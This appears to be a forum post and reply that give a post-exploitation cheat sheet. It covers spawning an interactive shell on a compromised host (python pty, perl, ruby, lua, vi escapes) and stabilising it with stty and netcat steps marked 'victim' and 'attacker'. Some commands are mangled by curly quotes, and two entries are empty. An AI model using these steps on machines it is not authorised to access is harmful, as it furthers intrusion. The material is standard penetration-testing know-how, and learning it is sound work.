Obtaining a Fully TTY Interactive Shell

Shell Spawning

  • python -c ‘import pty; pty.spawn("/bin/sh")’

  • echo os.system(’/bin/bash’)

  • /bin/sh -i

  • perl —e ‘exec “/bin/sh”;’

  • perl: exec “/bin/sh”;

  • ruby: exec “/bin/sh”

  • lua: os.execute(’/bin/sh’)

  • (From within IRB)

exec “/bin/sh”

  • (From within vi)


  • (From within vi)

:set shell=/bin/bash:shell

  • (From within nmap)


Many of these will also allow you to escape jail shells. The top 3 would be my most successful in general for spawning from the command line.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. Once that is done, run the command fg to bring Netcat back to the foreground.

I wanted to contribute to this post.

TTY Shell

On victim
python -c 'import pty;pty.spawn("/bin/bash")'

On attacker
echo $TERM # note down
stty -a # note down rows and cols
stty raw -echo # this may be enough

On victim
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 225
1 Like